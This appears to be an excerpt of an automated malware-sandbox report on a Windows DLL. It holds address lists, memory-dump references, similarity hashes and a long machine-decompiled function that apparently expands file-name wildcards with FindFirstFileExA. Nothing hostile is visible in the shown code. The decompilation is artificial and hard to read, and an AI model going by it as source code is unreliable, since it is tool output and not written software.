0x6e1b79e4
0x00000000
0x00000000
0x6e1b79e6
0x6e1b79e9
0x6e1b79ec
0x00000000
0x00000000
0x6e1b79f2
0x6e1b79f6
0x00000000
0x00000000
0x6e1b79f8
0x6e1b79fb
0x6e1b79fe
0x00000000
0x00000000
0x6e1b7a04
0x6e1b7a08
0x00000000
0x00000000
0x6e1b7a0a
0x6e1b7a0d
0x6e1b7a10
0x00000000
0x00000000
0x6e1b7a16
0x6e1b7a1a
0x00000000
0x00000000
0x6e1b7a20
0x6e1b7a23
0x6e1b7a26
0x00000000
0x00000000
0x6e1b7a2c
0x6e1b7a30
0x00000000
0x00000000
0x6e1b7a36
0x6e1b7a39
0x6e1b7a3c
0x00000000
0x00000000
0x6e1b7a42
0x6e1b7a46
0x00000000
0x00000000
0x6e1b7a4c
0x6e1b7a4f
0x6e1b7a52
0x00000000
0x00000000
0x6e1b7a54
0x6e1b7a58
0x00000000
0x00000000
0x6e1b7a5e
0x6e1b7a61
0x6e1b7a64
0x00000000
0x00000000
0x6e1b7a66
0x6e1b7a6a
0x00000000
0x00000000
0x6e1b7a70
0x6e1b7a73
0x6e1b7a76
0x00000000
0x00000000
0x6e1b7a78
0x6e1b7a7c
0x00000000
0x00000000
0x6e1b7a82
0x6e1b7a85
0x6e1b7a88
0x00000000
0x00000000
0x6e1b7a8a
0x6e1b7a8e
0x00000000
0x00000000
0x6e1b7a94
0x6e1b7a9a
0x6e1b7a9d
0x00000000
0x00000000
0x6e1b7a9f
0x6e1b7aa6
0x00000000
0x00000000
0x6e1b7aa8
0x00000000
0x6e1b7992
0x6e1b7978
0x00000000
0x6e1b7978
0x6e1b7953
0x00000000
0x6e1b7953
0x6e1b7938
0x6e1b793b
0x00000000
0x00000000
0x00000000
0x6e1b793b
0x6e1b7815
0x6e1b7798
0x6e1b779f
0x6e1b77a4
0x6e1b77aa
0x00000000
0x6e1b77aa
0x6e1b779a
0x6e1b779d
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 6E1B7B4F

Strings

p, xrefs: 6E1B7880
f, xrefs: 6E1B785D
p, xrefs: 6E1B7864
f, xrefs: 6E1B7879
:, xrefs: 6E1B7834
f, xrefs: 6E1B78BF
p, xrefs: 6E1B78C6

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: c44347ea209cca2d3f3817adeca80b4a302cf697598338aed240f8cc2065c329
Instruction ID: 633378bc7cced52586a8086d79988f0dc25c91e2bfc814dc110decec0ffd6354
Opcode Fuzzy Hash: c44347ea209cca2d3f3817adeca80b4a302cf697598338aed240f8cc2065c329
Instruction Fuzzy Hash: 41027135A0011A9AEF60DFE9C8A46EEB7B2FB01B14FA44757D514AB2C0D7704EC4EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB180, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1DB180(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAA _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t328;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				intOrPtr _t345;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int* _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t361;
				signed int* _t362;
				signed int _t365;
				signed int _t367;
				void* _t370;
				void* _t373;
				union _FINDEX_INFO_LEVELS _t374;
				signed int _t377;
				signed int* _t379;
				signed int* _t382;
				signed int _t384;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t392;
				signed int _t398;
				intOrPtr* _t399;
				signed int _t404;
				intOrPtr* _t405;
				signed int _t407;
				void* _t409;
				intOrPtr* _t410;
				signed int _t413;
				intOrPtr* _t416;
				signed int _t421;
				signed int _t427;
				signed int _t429;
				intOrPtr* _t440;
				signed int _t443;
				short _t444;
				signed int _t449;
				intOrPtr* _t450;
				signed int _t458;
				signed int _t460;
				intOrPtr* _t461;
				signed int _t466;
				signed int _t467;
				void* _t468;
				void* _t469;
				intOrPtr* _t470;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t479;
				signed int _t481;
				signed int _t483;
				signed int _t485;
				intOrPtr _t486;
				signed int _t488;
				signed int* _t493;
				signed int _t494;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t500;
				signed int* _t501;
				signed int _t502;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				void* _t509;
				intOrPtr _t510;
				void* _t511;
				signed int _t514;
				signed int _t519;
				void* _t520;
				void* _t521;
				signed int _t522;
				void* _t523;
				void* _t524;
				signed int _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				signed int _t529;
				void* _t530;
				void* _t531;

				_t216 = _a8;
				_t524 = _t523 - 0x28;
				_push(__esi);
				_t535 = _t216;
				if(_t216 != 0) {
					_t493 = _a4;
					_push(__ebx);
					_t365 = 0;
					_push(__edi);
					 *_t216 = 0;
					_t479 = 0;
					_t217 =  *_t493;
					_t382 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t365;
						_t219 = _t382 - _t479;
						_t494 = _t479;
						_v12 = _t494;
						_t457 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t382 - _t494;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t496 =  !_t494 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t496;
						if(_t496 != 0) {
							_t356 = _t479;
							_t476 = _t365;
							do {
								_t450 =  *_t356;
								_t20 = _t450 + 1; // 0x1
								_v20 = _t20;
								do {
									_t358 =  *_t450;
									_t450 = _t450 + 1;
									__eflags = _t358;
								} while (_t358 != 0);
								_t365 = _t365 + 1 + _t450 - _v20;
								_t356 = _v12 + 4;
								_t476 = _t476 + 1;
								_v12 = _t356;
								__eflags = _t476 - _t496;
							} while (_t476 != _t496);
							_t457 = _v16;
							_v8 = _t365;
							_t365 = 0;
							__eflags = 0;
						}
						_t497 = E6E1CE104(_t221, _t457, _v8, 1);
						_t525 = _t524 + 0xc;
						__eflags = _t497;
						if(_t497 != 0) {
							_v12 = _t479;
							_t224 = _t497 + _v16 * 4;
							_t383 = _t224;
							_v28 = _t224;
							_t225 = _t479;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t365;
								 *_a8 = _t497;
								_t498 = _t365;
								goto L25;
							} else {
								_t460 = _t497 - _t479;
								__eflags = _t460;
								_v32 = _t460;
								do {
									_t235 =  *_t225;
									_t461 = _t235;
									_v24 = _t235;
									_v20 = _t461 + 1;
									do {
										_t237 =  *_t461;
										_t461 = _t461 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t238 = _t461 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E6E1E320D(_t383, _v28 - _t383 + _v8, _v24);
									_t525 = _t525 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t365);
										_push(_t365);
										_push(_t365);
										_push(_t365);
										_push(_t365);
										E6E1C22EF();
										asm("int3");
										_t519 = _t525;
										_t526 = _t525 - 0x34;
										_t244 =  *0x6e21801c; // 0xd8901f95
										_v84 = _t244 ^ _t519;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t497);
										_t501 = _v72;
										_v100 = _t501;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t365);
											_push(_t479);
											_t481 = 0;
											 *_t246 = 0;
											_t367 = 0;
											_t247 =  *_t501;
											_t389 = 0;
											_v52 = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t481;
												_t249 = _t389 - _t367;
												_t502 = _t367;
												_v28 = _t502;
												_t465 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t389 - _t502;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t504 =  !_t502 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t504;
												if(_t504 != 0) {
													_t343 = _t367;
													_t473 = _t481;
													do {
														_t440 =  *_t343;
														_t87 = _t440 + 2; // 0x2
														_v32 = _t87;
														do {
															_t345 =  *_t440;
															_t440 = _t440 + 2;
															__eflags = _t345 - _t481;
														} while (_t345 != _t481);
														_v24 = _v24 + 1 + (_t440 - _v32 >> 1);
														_t343 = _v28 + 4;
														_t473 = _t473 + 1;
														_v28 = _t343;
														__eflags = _t473 - _t504;
													} while (_t473 != _t504);
													_t465 = _v36;
												}
												_t505 = E6E1CE104(_t251, _t465, _v24, 2);
												_t527 = _t526 + 0xc;
												__eflags = _t505;
												if(_t505 != 0) {
													_v28 = _t367;
													_t254 = _t505 + _v36 * 4;
													_t466 = _t254;
													_v60 = _t254;
													_t255 = _t367;
													_v36 = _t466;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t481;
														 *_v40 = _t505;
														_t506 = _t481;
														goto L58;
													} else {
														_t398 = _t505 - _t367;
														__eflags = _t398;
														_v20 = _t398;
														do {
															_t266 =  *_t255;
															_t399 = _t266;
															_v56 = _t266;
															_v32 = _t399 + 2;
															do {
																_t268 =  *_t399;
																_t399 = _t399 + 2;
																__eflags = _t268 - _t481;
															} while (_t268 != _t481);
															_t269 = (_t399 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t404 = _t466 - _v60 >> 1;
															_t272 = E6E1DE6DB(_t466, _v24 - _t404, _v56);
															_t527 = _t527 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t481);
																_push(_t481);
																_push(_t481);
																_push(_t481);
																_push(_t481);
																E6E1C22EF();
																asm("int3");
																_push(_t519);
																_t520 = _t527;
																_push(_t404);
																_t405 = _v160;
																_t136 = _t405 + 1; // 0x1
																_t468 = _t136;
																do {
																	_t274 =  *_t405;
																	_t405 = _t405 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t481);
																_t483 = _a4;
																_t407 = _t405 - _t468 + 1;
																_v16 = _t407;
																__eflags = _t407 -  !_t483;
																if(_t407 <=  !_t483) {
																	_push(_t367);
																	_t139 = _t483 + 1; // 0x1
																	_t370 = _t139 + _t407;
																	_t509 = E6E1D16BE(_t370, 1);
																	_t409 = _t505;
																	__eflags = _t483;
																	if(_t483 == 0) {
																		L73:
																		_push(_v16);
																		_t370 = _t370 - _t483;
																		_t279 = E6E1E320D(_t509 + _t483, _t370, _v4);
																		_t528 = _t527 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t379 = _a8;
																			_t336 = E6E1DBC9E(_t379);
																			_v16 = _t336;
																			__eflags = _t336;
																			if(_t336 == 0) {
																				 *(_t379[1]) = _t509;
																				_t514 = 0;
																				_t148 =  &(_t379[1]);
																				 *_t148 = _t379[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E6E1D1BE4(_t509);
																				_t514 = _v16;
																			}
																			E6E1D1BE4(0);
																			_t339 = _t514;
																			goto L70;
																		}
																	} else {
																		_push(_t483);
																		_t341 = E6E1E320D(_t509, _t370, _v0);
																		_t528 = _t527 + 0x10;
																		__eflags = _t341;
																		if(_t341 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E6E1C22EF();
																			asm("int3");
																			_push(_t520);
																			_t521 = _t528;
																			_push(_t409);
																			_t410 = _v200;
																			_push(_t370);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t410 + 2; // 0x2
																			_t469 = _t151;
																			do {
																				_t281 =  *_t410;
																				_t410 = _t410 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t485 = _v0;
																			_t413 = (_t410 - _t469 >> 1) + 1;
																			_v20 = _t413;
																			__eflags = _t413 -  !_t485;
																			if(_t413 <=  !_t485) {
																				_push(_t509);
																				_t154 = _t485 + 1; // 0x1
																				_t373 = _t154 + _t413;
																				_t510 = E6E1D16BE(_t373, 2);
																				__eflags = _t485;
																				if(_t485 == 0) {
																					L86:
																					_push(_v20);
																					_t373 = _t373 - _t485;
																					_t286 = E6E1DE6DB(_t510 + _t485 * 2, _t373, _v8);
																					_t529 = _t528 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t488 = _a4;
																						_t377 = E6E1DBC9E(_t488);
																						__eflags = _t377;
																						if(_t377 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t488 + 4)))) = _t510;
																							 *((intOrPtr*)(_t488 + 4)) =  *((intOrPtr*)(_t488 + 4)) + 4;
																							_t377 = 0;
																							__eflags = 0;
																						} else {
																							E6E1D1BE4(_t510);
																						}
																						E6E1D1BE4(0);
																						_t333 = _t377;
																						goto L83;
																					}
																				} else {
																					_push(_t485);
																					_t335 = E6E1DE6DB(_t510, _t373, _v4);
																					_t529 = _t528 + 0x10;
																					__eflags = _t335;
																					if(_t335 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E6E1C22EF();
																						asm("int3");
																						_push(_t521);
																						_t522 = _t529;
																						_t530 = _t529 - 0x298;
																						_t289 =  *0x6e21801c; // 0xd8901f95
																						_v252 = _t289 ^ _t522;
																						_t416 = _v236;
																						_t470 = _v232;
																						_push(_t373);
																						_push(_t485);
																						_t486 = _v240;
																						_v852 = _t470;
																						__eflags = _t416 - _t486;
																						if(_t416 != _t486) {
																							while(1) {
																								_t328 =  *_t416;
																								__eflags = _t328 - 0x2f;
																								if(_t328 == 0x2f) {
																									break;
																								}
																								__eflags = _t328 - 0x5c;
																								if(_t328 != 0x5c) {
																									__eflags = _t328 - 0x3a;
																									if(_t328 != 0x3a) {
																										_t416 = E6E1E56C0(_t486, _t416);
																										__eflags = _t416 - _t486;
																										if(_t416 != _t486) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t470 = _v624;
																						}
																						_t291 =  *_t416;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t374 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t374;
																							_v680 = _t374;
																							_push(_t510);
																							asm("sbb eax, eax");
																							_v676 = _t374;
																							_v672 = _t374;
																							_v652 =  ~(_t292 & 0x000000ff) & _t416 - _t486 + 0x00000001;
																							_v668 = _t374;
																							_v664 = _t374;
																							_t298 = E6E1CB296(_t416 - _t486 + 1, _t486,  &_v684, E6E1DBBD9(_t470, __eflags));
																							_t531 = _t530 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExA( !( ~_t298) & _v676, _t374,  &_v616, _t374, _t374, _t374);
																							_t511 = _t302;
																							__eflags = _t511 - 0xffffffff;
																							if(_t511 != 0xffffffff) {
																								_t421 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t421;
																								_v656 = _t421 >> 2;
																								do {
																									_v648 = _t374;
																									_v644 = _t374;
																									_v640 = _t374;
																									_v636 = _t374;
																									_v632 = _t374;
																									_v628 = _t374;
																									_t308 = E6E1DB094( &(_v616.cFileName),  &_v648,  &_v617, E6E1DBBD9(_t470, __eflags));
																									_t531 = _t531 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t486);
																										_push(_t311);
																										L66();
																										_t531 = _t531 + 0x10;
																										_v660 = _t311;
																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t374;
																											if(_v628 != _t374) {
																												E6E1D1BE4(_v640);
																												_t311 = _v660;
																											}
																											_t374 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t427 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t427;
																										if(_t427 == 0) {
																											L114:
																											__eflags = _v628 - _t374;
																											if(_v628 != _t374) {
																												E6E1D1BE4(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t427 - 0x2e;
																											if(_t427 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t374;
																												if( *((intOrPtr*)(_t311 + 2)) == _t374) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t511);
																									goto L123;
																									L116:
																									__eflags = FindNextFileA(_t511,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t429 = _v656;
																								_t471 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
																								__eflags = _t429 - _t322;
																								if(_t429 != _t322) {
																									E6E1E5230(_t374, _t486, _t511, _t471 + _t429 * 4, _t322 - _t429, 4, E6E1DB07C);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t374);
																								_push(_t374);
																								_push(_t486);
																								L66();
																								_t374 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							if(_v664 != 0) {
																								E6E1D1BE4(_v676);
																							}
																						} else {
																							__eflags = _t416 - _t486 + 1;
																							if(_t416 == _t486 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t470);
																								_push(0);
																								_push(0);
																								_push(_t486);
																								L66();
																							}
																						}
																						__eflags = _v24 ^ _t522;
																						return E6E1A93EA(_v24 ^ _t522);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t333 = 0xc;
																				L83:
																				return _t333;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t339 = 0xc;
																	L70:
																	return _t339;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t342 = _v28;
															_t472 = _v36;
															 *((intOrPtr*)(_v20 + _t342)) = _t472;
															_t255 = _t342 + 4;
															_v28 = _t255;
															_t466 = _t472 + _v32 * 2;
															_v36 = _t466;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t506 = _t505 | 0xffffffff;
													_v24 = _t505 | 0xffffffff;
													L58:
													E6E1D1BE4(_t481);
													_pop(_t390);
													goto L59;
												}
											} else {
												while(1) {
													_t443 = 0x2a;
													_v20 = _t443;
													_t444 = 0x3f;
													_v18 = _t444;
													_v16 = 0;
													_t350 = E6E1DE73F(_t247,  &_v20);
													_t390 =  *_t501;
													__eflags = _t350;
													if(_t350 != 0) {
														_t351 = E6E1DB953(_t367, _t481, _t501, _t390, _t350,  &_v52);
														_t526 = _t526 + 0xc;
														_v24 = _t351;
														_t506 = _t351;
													} else {
														_t352 =  &_v52;
														_push(_t352);
														_push(_t481);
														_push(_t481);
														_push(_t390);
														L79();
														_t506 = _t352;
														_t526 = _t526 + 0x10;
														_v24 = _t506;
													}
													__eflags = _t506;
													if(_t506 != 0) {
														break;
													}
													_t501 = _v28 + 4;
													_v28 = _t501;
													_t247 =  *_t501;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t367 = _v52;
														_t389 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t367 = _v52;
												L59:
												_t467 = _t367;
												_v40 = _t467;
												__eflags = _v48 - _t467;
												asm("sbb ecx, ecx");
												_t392 =  !_t390 & _v48 - _t467 + 0x00000003 >> 0x00000002;
												__eflags = _t392;
												_v20 = _t392;
												if(_t392 != 0) {
													_t508 = _t392;
													do {
														E6E1D1BE4( *_t367);
														_t481 = _t481 + 1;
														_t367 = _t367 + 4;
														__eflags = _t481 - _t508;
													} while (_t481 != _t508);
													_t367 = _v52;
													_t506 = _v24;
												}
												E6E1D1BE4(_t367);
												goto L64;
											}
										} else {
											_t353 = E6E1C23F4(__eflags);
											_t506 = 0x16;
											 *_t353 = _t506;
											E6E1C22C2();
											L64:
											__eflags = _v12 ^ _t519;
											return E6E1A93EA(_v12 ^ _t519);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t355 = _v12;
									_t449 = _v16;
									 *((intOrPtr*)(_v32 + _t355)) = _t449;
									_t225 = _t355 + 4;
									_t383 = _t449 + _v20;
									_v16 = _t449 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t498 = _t497 | 0xffffffff;
							_v12 = _t498;
							L25:
							E6E1D1BE4(_t365);
							_pop(_t384);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t365;
							_t360 = E6E1E5680(_t217,  &_v8);
							_t384 =  *_t493;
							__eflags = _t360;
							if(_t360 != 0) {
								_push( &_v44);
								_push(_t360);
								_push(_t384);
								L92();
								_t524 = _t524 + 0xc;
								_v12 = _t360;
								_t498 = _t360;
							} else {
								_t361 =  &_v44;
								_push(_t361);
								_push(_t365);
								_push(_t365);
								_push(_t384);
								L66();
								_t498 = _t361;
								_t524 = _t524 + 0x10;
								_v12 = _t498;
							}
							__eflags = _t498;
							if(_t498 != 0) {
								break;
							}
							_t493 = _a4 + 4;
							_a4 = _t493;
							_t217 =  *_t493;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t479 = _v44;
								_t382 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t479 = _v44;
						L26:
						_t458 = _t479;
						_v32 = _t458;
						__eflags = _v40 - _t458;
						asm("sbb ecx, ecx");
						_t386 =  !_t384 & _v40 - _t458 + 0x00000003 >> 0x00000002;
						__eflags = _t386;
						_v28 = _t386;
						if(_t386 != 0) {
							_t500 = _t386;
							do {
								E6E1D1BE4( *_t479);
								_t365 = _t365 + 1;
								_t479 = _t479 + 4;
								__eflags = _t365 - _t500;
							} while (_t365 != _t500);
							_t479 = _v44;
							_t498 = _v12;
						}
						E6E1D1BE4(_t479);
						goto L31;
					}
				} else {
					_t362 = E6E1C23F4(_t535);
					_t498 = 0x16;
					 *_t362 = _t498;
					E6E1C22C2();
					L31:
					return _t498;
				}
				L127:
			}

0x6e1db185
0x6e1db188
0x6e1db18b
0x6e1db18c
0x6e1db18e
0x6e1db1a4
0x6e1db1a7
0x6e1db1a8
0x6e1db1aa
0x6e1db1ab
0x6e1db1ad
0x6e1db1af
0x6e1db1b1
0x6e1db1b3
0x6e1db1b6
0x6e1db1b9
0x6e1db1bc
0x6e1db1be
0x6e1db221
0x6e1db223
0x6e1db226
0x6e1db228
0x6e1db22c
0x6e1db235
0x6e1db236
0x6e1db239
0x6e1db23b
0x6e1db23e
0x6e1db242
0x6e1db242
0x6e1db244
0x6e1db246
0x6e1db248
0x6e1db24a
0x6e1db24a
0x6e1db24c
0x6e1db24f
0x6e1db252
0x6e1db252
0x6e1db254
0x6e1db255
0x6e1db255
0x6e1db260
0x6e1db262
0x6e1db265
0x6e1db266
0x6e1db269
0x6e1db269
0x6e1db26d
0x6e1db270
0x6e1db273
0x6e1db273
0x6e1db273
0x6e1db280
0x6e1db282
0x6e1db285
0x6e1db287
0x6e1db29f
0x6e1db2a2
0x6e1db2a5
0x6e1db2a7
0x6e1db2aa
0x6e1db2ac
0x6e1db2af
0x6e1db2b2
0x6e1db30f
0x6e1db312
0x6e1db315
0x6e1db317
0x00000000
0x6e1db2b4
0x6e1db2b6
0x6e1db2b6
0x6e1db2b8
0x6e1db2bb
0x6e1db2bb
0x6e1db2bd
0x6e1db2bf
0x6e1db2c5
0x6e1db2c8
0x6e1db2c8
0x6e1db2ca
0x6e1db2cb
0x6e1db2cb
0x6e1db2d2
0x6e1db2d5
0x6e1db2d9
0x6e1db2e6
0x6e1db2eb
0x6e1db2ee
0x6e1db2f0
0x6e1db364
0x6e1db365
0x6e1db366
0x6e1db367
0x6e1db368
0x6e1db369
0x6e1db36e
0x6e1db372
0x6e1db374
0x6e1db377
0x6e1db37e
0x6e1db381
0x6e1db384
0x6e1db387
0x6e1db388
0x6e1db38b
0x6e1db38e
0x6e1db390
0x6e1db3a6
0x6e1db3a7
0x6e1db3a8
0x6e1db3aa
0x6e1db3ac
0x6e1db3ae
0x6e1db3b0
0x6e1db3b2
0x6e1db3b5
0x6e1db3b8
0x6e1db3bb
0x6e1db3bd
0x6e1db42b
0x6e1db42d
0x6e1db430
0x6e1db432
0x6e1db436
0x6e1db43f
0x6e1db440
0x6e1db443
0x6e1db445
0x6e1db448
0x6e1db44c
0x6e1db44c
0x6e1db44e
0x6e1db450
0x6e1db452
0x6e1db454
0x6e1db454
0x6e1db456
0x6e1db459
0x6e1db45c
0x6e1db45c
0x6e1db45f
0x6e1db462
0x6e1db462
0x6e1db472
0x6e1db478
0x6e1db47b
0x6e1db47c
0x6e1db47f
0x6e1db47f
0x6e1db483
0x6e1db483
0x6e1db491
0x6e1db493
0x6e1db496
0x6e1db498
0x6e1db4b0
0x6e1db4b3
0x6e1db4b6
0x6e1db4b8
0x6e1db4bb
0x6e1db4bd
0x6e1db4c0
0x6e1db4c3
0x6e1db52d
0x6e1db530
0x6e1db533
0x6e1db535
0x00000000
0x6e1db4c5
0x6e1db4c7
0x6e1db4c7
0x6e1db4c9
0x6e1db4cc
0x6e1db4cc
0x6e1db4ce
0x6e1db4d0
0x6e1db4d6
0x6e1db4d9
0x6e1db4d9
0x6e1db4dc
0x6e1db4df
0x6e1db4df
0x6e1db4e9
0x6e1db4f1
0x6e1db4f5
0x6e1db4fb
0x6e1db501
0x6e1db506
0x6e1db509
0x6e1db50b
0x6e1db58c
0x6e1db58d
0x6e1db58e
0x6e1db58f
0x6e1db590
0x6e1db591
0x6e1db596
0x6e1db599
0x6e1db59a
0x6e1db59c
0x6e1db59d
0x6e1db5a0
0x6e1db5a0
0x6e1db5a3
0x6e1db5a3
0x6e1db5a5
0x6e1db5a6
0x6e1db5a6
0x6e1db5aa
0x6e1db5ab
0x6e1db5b2
0x6e1db5b5
0x6e1db5b8
0x6e1db5ba
0x6e1db5c2
0x6e1db5c4
0x6e1db5c7
0x6e1db5d1
0x6e1db5d4
0x6e1db5d5
0x6e1db5d7
0x6e1db5eb
0x6e1db5eb
0x6e1db5ee
0x6e1db5f8
0x6e1db5fd
0x6e1db600
0x6e1db602
0x00000000
0x6e1db604
0x6e1db604
0x6e1db609
0x6e1db610
0x6e1db613
0x6e1db615
0x6e1db626
0x6e1db628
0x6e1db62a
0x6e1db62a
0x6e1db62a
0x6e1db617
0x6e1db618
0x6e1db61d
0x6e1db620
0x6e1db62f
0x6e1db635
0x00000000
0x6e1db638
0x6e1db5d9
0x6e1db5d9
0x6e1db5df
0x6e1db5e4
0x6e1db5e7
0x6e1db5e9
0x6e1db63b
0x6e1db63d
0x6e1db63e
0x6e1db63f
0x6e1db640
0x6e1db641
0x6e1db642
0x6e1db647
0x6e1db64a
0x6e1db64b
0x6e1db64d
0x6e1db64e
0x6e1db651
0x6e1db652
0x6e1db653
0x6e1db655
